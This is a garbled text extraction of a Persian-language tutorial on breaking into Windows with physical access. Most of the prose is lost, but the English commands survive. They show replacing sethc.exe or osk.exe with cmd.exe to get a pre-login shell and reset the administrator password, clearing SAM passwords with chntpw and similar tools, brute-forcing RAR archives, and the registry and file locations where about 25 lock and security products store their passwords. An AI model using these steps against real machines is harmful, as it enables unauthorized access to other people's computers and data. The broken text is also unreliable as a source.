Windows Hacking and Security Book Only Physical Access

1
2

.

.
Windows Hacking and Security Book

Only Physical Access
Lesson 2
Author :
Moslem Haghighian
L4tr0d3ctism
Location :
Sanandaj
L4tr0d3ctism(47)Y4h00com , L4tr0d3ctism(47)H0tm4ilcom , L4tr0d3ctism(47)Gm4ilcom
Spider Security Team
Greeting to :
SHabgard Digital Security Groups Members
Black Hat Group Security Center members
L4tr0d3ctisn@yahoo.com , l4tr0d3ctism@gmail.com , L4tr0d3ctism@hotmail.com
SpideR
: 1
: 2

...
.

.
. .
.
.

administrator

) User Accounts (Control Userpasswords2
) lusrmgr.msc( Local Users And Groups
Net User Command

syskey
SYskey Administrator
guest admiistrators
Welcom Screen

-
Active@ Password Changer
Ubuntu Live CD
NTPswd
PC Login Now
Windows Login Password Professional
Winrar

-
Access Administrator
Click And Lock1
Program Protector
Ashampoo Magical Security
Anfibia Deskman
Access lock
Private Encryption
XP Smoker
Lock My Pc
PC Security Tweaker
PC Security
Securr Browser
Securr Browser
Password Door
FolderMage Pro
Stealth Encrypto
Private Desktop
nod32
USB Disk Security
Hide My Folders
Private Pix
Clear Lock
Security Administrator
Anti porn
FolderGuard

.

.

.

.

( )
.
.

User name,
9
... Login , Id , User Id . Moslem
Admin Member

Admisnitrator , Guest
Guest
administrator

System .

. .
( (
( (
.
3
- 1
- 2
- 3
10
. .
.

.
.
.
3
11
Administrator
power users

: Sharing .
Guests
backup operators
network configuration
operators
remote desktop users
replicator group
replication
. DC
.
users group

.
.
debugger users
help service groups

.
.
12

.

.
.
every one
authenticated
users
anonymous log
( )
on
creator owner
...
dial up
intractive group
Network group
13

Adminsitrator .

Power Users
administrator
.
.
User , Password
. .
DataBase

DB
Security LSA ( Local Security
) Authority .
LSA SAM
( SAM DB )
Desktop
.
Administrator .
14
administrator

XP
Welcom Screen
administrator (
Alt + Ctrl + Duble
Delete
User name : administrator .

administrator
.
7 administrator

.
Net User Administrator password /active:yes
15
:
Administrator
.

.

.
Power User administrator
. .
.

) User Accounts (Control Userpasswords2

Run Control Userpasswords2 .
. Reset
...Password (. )
16
) lusrmgr.msc( Local Users And Groups

. lusrmgr.msc Run
17
UserS
Set Password ... Proceed .
( )
Net User Command

Run Ms-Dos
Net User AccountName Passoword
AccountsName Password
.
spider .
Net User Spider p4ssw0rd
Spider p4ssw0rd .
:2
18
Account 1sp1d3r t34m .
: 1
: 2

: 3 ""

"U S E R" "P a S s W o R d"Net user
Spider Team ( )
: 4 ""
Net User User
.

.
Guests
.

.
Local And Users Groups Users
Properties ( ( Member Of
19
Add Select Groups ...Advanced

.

Administrator .
20

. PSW
.
User Account
Prevent a Forgotten password (
).

Next .
20
Next
.
UsB Format .
Next .
21

Next .
Next
Next Finish .
22
23
Switch User
Adminsitrator
.
24
Password Hint .

25
syskey
Limit Guest
Syskey
.
.
26
SYskey Administrator

.
bootable
.

%winddir%\repair
%winddir%:\WINDOWS\system32\config

.
Administrator Syskey
. 7 Regback Config

Repir
.

guest admiistrators
sysshell
Spoolsv System32 . Spoolsv .
fat Fat32 .
27
Spoolsv

spoolsv
.
A:\copy c:windows\system32\spoolsv.exe c:\ spoolsv.exe
spoolsv \:C
spoolsv System32 .
A:\ copy spoolsv.exe c:\windows\system32\spoolsv.exe
Guest
Administrator Net user administrator l4tr0d3ctism
administrator L4tr0d3ctism .
Spoolsv Spoolsv
.
copy c:\spoolsv.exe c:\windows\system32\spoolsv.exe
Del C:\spoolsv.exe
ntfs

Boot spoolsv .
$mnt/nt1/spoolsv.exef/ cp /mnt/windows/system32/spoolsv.exe
28
spoolsv system32
nt1
\ C: .
Spoolsv
$mnt/nt1/windows/system32/spoolsv.exe/ sc /mnt/nt1/spoolsv.exe
guest

Guest Syskey .
Welcom Screen
Welcom Screen Exe
.
welcom screen
System .

System .
Welcom screen .
.
Seven
29
Displayswitch.exe sethc.exe narrattor.exe magnify.exe OSK.exe - utilman.exe
XP
sethc.exe msswchx.exe osk.exe Magnify.exe narrator.exe utilman.exe
1 exe Exe

) Shell(text1.text
OSK.exe bootable
BOOT OSK.EXE SYSTE32 OSK
. Boot

Copy C:\windows\system32\OSK.exe C:\osk.exe
Copy Drive:\osk.exe C:\windows\system32\osk.exe
OSK.exe \ C:
.
30
Welcom Screen Win + U

. on Screen
keyboard .
Run Taskmgr- regedit cmd

... explorer .
Taskmgr
31
Cmd
Regedit
32
explorer System Seven .
CMD.exe
. CMD.exe Sethc.exe .
Sethc.exe Shift
.
33
5 6 Shift
.
Sethc.exe
C:\Windows\System32\Sethc.exe
CMD.exe Sethc.exe System32 .
.
copy c:\windows\system32\sethc.exe c:\sethc.exe
copy c:\windows\system32\cmd.exe c:\windows\syetm32\sethc.exe
Ren c:\windows\system32\sethc.exe c:\windows\syetm32\sethc1.exe
Ren c:\windows\system32\cmd.exe c:\windows\syetm32\sethc.exe
5 Shift
CMD sethc.exe Net User administrator 123
administrator ... .
34
Safemod

copy c:\windows\syetm32\sethc.exe c:\windows\system32\cmd.exe
copy c:\sethc.exe c:\windows\system32\sethc.exe
Ren c:\windows\syetm32\sethc.exe c:\windows\system32\cmd.exe
Ren c:\windows\syetm32\sethc1.exe c:\windows\system32\sethc.exe
Syskey .

.
SAM

MD4
( ) MD4 SAM
.
NTFS
35
NTFS4Dos
Fat32 .

- 1 USB Flash (
)
- 2 Run
SAM
- 3 Sam
- 4 ...
Active@ Password Changer

FAT16 / FAT32 / NTFS / NTFS5
NT / 2000 / XP / 2003 / 2008 / VISTA 64 .
36
PasswordChanger.exe
SAM .
: Chose The Logical Drive
.
: Search For MS SAM database(S) On All Hard Disks And logical drive

SAM .
.
37
. Next
.
SAM
Sam .
Vista XP WINDOWS\SYSTEM32\CONFIG .
Next .
administrator
.
38
Clear This Users Password
Ubuntu Live CD
Ubuntu
live Ubuntu Hiren boots 12 .
Xp (SP1,2,3) , Vista , Seven ,
) Windows server (2003 , 2008 . chntpw .
Tab Os STSTEM Synaptic Package Manager

.
39
chntpw

,universe repository .
Synaptic
Package Manage Settings Repositories .
)Community-maintained Open Source software (universe
40
ReLoad
Open source .
Qick Search chntpw .
41
. Mark For Installation .
Applay .
APPLY .
42
.
64 BIT 64 chntpw
Ubuntu . DEB .
http://packages.debian.org/sid/amd64/chntpw/download
43
.
Terminal APPlication > Accessories

.
cd Downloads
*sudo dpkg i chntpw

44
Chntpw Ubuntu
chntpw SAM
. .

.
Places Filesystem .
45
Title bar .
Terminal Applications > Accessories > Terminal.
cd /media
46
Ls

.

> < CD
cd WINDOWS/system32/config/ Config .
SAM
sudo chntpw SAM

4

47

: Clear ( Blank ) user password 1 .
: Edit ( Set new ) userpassword 2
: Promote User (Make user an administrator ) - 3
:Unlock and enable user accounts 4
1 Y .
sudo chntpw u <username> SAM
48

Syskey .
NTPswd
ntpswd

Fat32 NTFS
Xp (sp2-sp3),vista , Seven .
.
.
http://pogostick.net/~pnh/ntpasswd/bootdisk.html
windows 2000 ,
49

. ISO .

Press ENTER at the boot: prompt, shown above
Load
50

Enter .
Hive
Config SAM .
Windows\System32\Config Enter
51
Sam 1 Sam
Enter .
1 Password USER .
52
.
Administrator
.
.
1 .
2
3 Limited administrator .
- 5 .
- 6 q .
( 1 )
53
"!"
" ".

)RID(Hex
! .
!
Sam
q Sam .
54
q .
Y N

Y n
55
56

.

Syskey
PC Login Now
PC Login .

NT Vista Xp
Seven . CD Boot
CD Boot
1
57
2 . Normal Boot
.
load
.
Next .
58
Sam .
59

Next .
. .
60
.
.
Windows 7/Vista/XP/2008/2003/2000 Server
2008/2003/2000 .

.
Next .
CD
.
.
USB
Burn
61
USB Flash Start

USB .
Close
62
USB Flash CD
Sam .

Next
63

Server 2008 , 2003
Reset
Domain administrator password for Server 2008/2003/2000 Next

.
Next
Reboot .
64
Winrar

.

winrar
.
Winrar
AES 128

.
Rar .
40% .
Rar ...
... .com Rar
www. .
comment
...
65
.
Txt ... Inf

.
comment ... (
) Sanandaj
shabgard
shabgard.org
www.shabgard.org
Shabgard
Shabgard.org
www.Shabgard.org
WWW.SHABGARD.ORG

( )
( (
Rar ...
( )
.
Rar SST
( )
66
" SST.rar + ":

Password : + SST.rar

.
.

123456
12312355555

.
... zerangtarinam
%90
. :
...
winrar password recovery
winrar password remover
Winrar
... Password Cracker

2 .
67
1 ( ) Dictionary
2 ( ) Brute Force
Dictionary
DB

.

.
TXT
.
brute force
1
20 100%
Winrar
{| s04(#P5?< R 13
4 -3 .
. D :
Brute force
68

.
...
1000
0000
Client1
2000
1001
Client2
3000
2001
Client3
4000
3001
Client4
4001
Client5
Client6
Client7
...
.
.
69
) .
:d ............. .
Access Administrator
.
HKEY_LOCAL_MACHINE\SOFTWARE\Access Administrator
f94b2aa 281744411 .
Click And Lock1

.
HKEY_CURRENT_USER\Software\Microsoft\Secsys\pm
PWD "" Null .
Program Protector
.
\HKEY_LOCAL_MACHINE\SOFTWARE\Karlis Blumentals\Program Protector\3.0
password .
70
Ashampoo Magical Security

.
HKEY_CURRENT_USER\Software\Ashampoo\Ashampoo Magical Security 2
. prevPasswordHash
Anfibia Deskman

C:\users\ All Users\Application Data\Deskman9\
. deskman.dat
Access lock

C:\users\ All Users\Application Data\Access Lock
. f2c01301.dat
71
Private Encryption
dwphtlts.dvr Show Hidden My Documents
.

HKEY_CURRENT_USER\Software\Microsoft\trsys\copp\
u

HKEY_CURRENT_USER\Software\Microsoft\trsys\copp\
. t
XP Smoker

HKEY_LOCAL_MACHINE\SOFTWARE\WareSoft Software\XP Smoker
. Password Set
Lock My Pc

HKEY_LOCAL_MACHINE\SOFTWARE\FSPro Labs\Lock My PC 4
. hkSm
72
PC Security Tweaker

HKEY_LOCAL_MACHINE\SOFTWARE\PC Security Tweaker
DEFAOPTIONS
st Security Agent1

HKEY_LOCAL_MACHINE\SOFTWARE\1st Security Agent
. DEFAOPTIONS
PC Security
X:\windows
gercescp.dvr
dwpces23.dru

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\trsys\copp\
S
73
Securr Browser
X:\windows
gerwrbes.dvr
b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Secsys\copp
Securr Browser
X:\windows
gerwrbes.dvr
b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Secsys\copp
Password Door
. End TLPD.exe

X:\User\All Users\Application Data\TopLang\Password Door
. PDoor.dat
74
FolderMage Pro

X:\windows\deff1.dat
Stealth Encrypto

X:\windows
.
GERHTS61.DRU
DWPHTS61.DRU
Private Desktop

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\trsys\pd
p

X:\windows
gerkseds.dvr .
75
nod32
. Safemode
HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info
. PackageID
USB Disk Security

HKEY_LOCAL_MACHINE\SOFTWARE\ZbshaLab\USBGuard
. pwd
Hide My Folders

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\H FCore
. Password
Private Pix

HKEY_CURRENT_USER\Software\Microsoft\Secsys\pm
. pwd
76
Clear Lock

HKEY_LOCAL_MACHINE\SOFTWARE\1st Security Agent
DEFAOPTIONS
Security Administrator

HKEY_LOCAL_MACHINE\SOFTWARE\Security Administrator
DEFAOPTIONS
Anti porn
:D
:d
Safe mode
X:\windows\Eleathe.bmp
FolderGuard

HKEY_LOCAL_MACHINE\SOFTWARE\WinAbility\FGD
FGP
X:\Users\All Users\Application Data\Folder Guard
FGp
77
.

.

.
.
78
Spider Security Team
From sanandaj
Author : Moslem Haghighian ( l4tr0d3ctism )
3mail : l4tr0d3ctism@yahoo@gmail@hotmail.com
Special Thanks To :
All SHabgard Digital Security Groups Members
All Black Hat Group Security Center members
|=453 914I-; 914I-;3

Windows Hacking and Security Book Only Physical Access

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Windows Hacking and Security Book Only Physical Access

Uploaded by

Copyright:

Available Formats

1

Windows Hacking and Security Book

L4tr0d3ctism(47)Y4h00com , L4tr0d3ctism(47)H0tm4ilcom , L4tr0d3ctism(47)Gm4ilcom

Spider Security Team

Black Hat Group Security Center members

L4tr0d3ctisn@yahoo.com , l4tr0d3ctism@gmail.com , L4tr0d3ctism@hotmail.com

Active@ Password Changer

Windows Login Password Professional

Click And Lock1

Ashampoo Magical Security

USB Disk Security

remote desktop users

help service groups

Security LSA ( Local Security

Alt + Ctrl + Duble

User name : administrator .

Net User Administrator password /active:yes

) User Accounts (Control Userpasswords2

) lusrmgr.msc( Local Users And Groups

Net User Command

sethc.exe msswchx.exe osk.exe Magnify.exe narrator.exe utilman.exe

Copy C:\windows\system32\OSK.exe C:\osk.exe

Copy Drive:\osk.exe C:\windows\system32\osk.exe

Run Taskmgr- regedit cmd

Ren c:\windows\system32\sethc.exe c:\windows\syetm32\sethc1.exe

Ren c:\windows\system32\cmd.exe c:\windows\syetm32\sethc.exe

copy c:\windows\syetm32\sethc.exe c:\windows\system32\cmd.exe

copy c:\sethc.exe c:\windows\system32\sethc.exe

Ren c:\windows\syetm32\sethc.exe c:\windows\system32\cmd.exe

Ren c:\windows\syetm32\sethc1.exe c:\windows\system32\sethc.exe

Active@ Password Changer

Clear This Users Password

Tab Os STSTEM Synaptic Package Manager

Package Manage Settings Repositories .

)Community-maintained Open Source software (universe

Qick Search chntpw .

Terminal APPlication > Accessories

Terminal Applications > Accessories > Terminal.

sudo chntpw SAM

sudo chntpw u <username> SAM

USB Flash Start

Server 2008 , 2003

Domain administrator password for Server 2008/2003/2000 Next

Txt ... Inf

" SST.rar + ":

winrar password recovery

winrar password remover

... Password Cracker

Click And Lock1

Ashampoo Magical Security

USB Disk Security

You might also like